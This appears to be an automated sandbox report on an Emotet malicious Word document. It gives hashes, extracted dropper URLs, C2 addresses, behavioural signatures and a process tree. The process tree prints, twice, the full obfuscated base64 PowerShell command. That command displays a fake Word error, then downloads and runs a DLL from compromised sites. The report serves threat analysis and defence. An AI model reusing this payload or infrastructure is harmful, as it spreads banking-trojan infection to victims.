emotet | b1ccfa373dfcf601e71eef31344b0d0101f33dc8b9e4b2a9b8ca797799b02193

General

Target

DAT_29_12_2020.doc
Size

164KB
MD5

734b3785978b6a3e545d0c2e54feebe9
SHA1

78b40c1e13ec5cc8e98fa3b629fe23f5df182326
SHA256

b1ccfa373dfcf601e71eef31344b0d0101f33dc8b9e4b2a9b8ca797799b02193
SHA512

822ee2579a87ac76325702fdf1f4c891b7223b151202d727df9cd36ed28f6332510f985e6959d82f74cdccf69c484233f21d3a48d35c3b3e3a7406ac92e4484f

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://206.189.146.42/wp-admin/F0xAutoConfig/XR9/

exe.dropper

http://paroissesaintabraham.com/wp-admin/H/

exe.dropper

https://lnfch.com/wp-includes/quC/

exe.dropper

https://nahlasolimandesigns.com/wp-admin/0HHK7/

exe.dropper

http://harmonimedia.com/wp-content/uploads/Zol/

exe.dropper

http://ncap.lbatechnologies.com/media/6iQ/

exe.dropper

https://lainiotisllc.com/postauth/7XhB/

Extracted

Family

emotet

Botnet

Epoch2

C2

74.58.215.226:80

24.164.79.147:8080

157.245.123.197:8080

50.116.111.59:8080

173.249.20.233:443

78.188.225.105:80

75.177.207.146:80

136.244.110.184:8080

194.190.67.75:80

70.92.118.112:80

110.145.101.66:443

194.4.58.192:7080

217.20.166.178:7080

109.74.5.95:8080

110.145.11.73:80

66.57.108.14:443

78.189.148.42:80

144.217.7.207:7080

120.150.60.189:80

37.139.21.175:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1112 1788 cmd.exe
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

6 860 powershell.exe
10 860 powershell.exe
12 860 powershell.exe
14 860 powershell.exe
16 1604 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

1584 rundll32.exe
1584 rundll32.exe
1584 rundll32.exe
1584 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	1788	cmd.exe

flow	pid	process
6	860	powershell.exe
10	860	powershell.exe
12	860	powershell.exe
14	860	powershell.exe
16	1604	rundll32.exe

pid	process
1584	rundll32.exe
1584	rundll32.exe
1584	rundll32.exe
1584	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Bypnfkjl\qebfhbp.ihr	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1008 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

860 powershell.exe
860 powershell.exe
1604 rundll32.exe
1604 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 860 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1008 WINWORD.EXE
1008 WINWORD.EXE

pid	process
1008	WINWORD.EXE

pid	process
860	powershell.exe
860	powershell.exe
1604	rundll32.exe
1604	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	860	powershell.exe

pid	process
1008	WINWORD.EXE
1008	WINWORD.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1112 wrote to memory of 1568	1112	cmd.exe	msg.exe
PID 1112 wrote to memory of 1568	1112	cmd.exe	msg.exe
PID 1112 wrote to memory of 1568	1112	cmd.exe	msg.exe
PID 1112 wrote to memory of 860	1112	cmd.exe	powershell.exe
PID 1112 wrote to memory of 860	1112	cmd.exe	powershell.exe
PID 1112 wrote to memory of 860	1112	cmd.exe	powershell.exe
PID 860 wrote to memory of 1660	860	powershell.exe	rundll32.exe
PID 860 wrote to memory of 1660	860	powershell.exe	rundll32.exe
PID 860 wrote to memory of 1660	860	powershell.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1660 wrote to memory of 1584	1660	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe
PID 1584 wrote to memory of 1604	1584	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DAT_29_12_2020.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1008

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll Control_RunDLL
3⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll Control_RunDLL
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bypnfkjl\qebfhbp.ihr",Control_RunDLL
5⤵
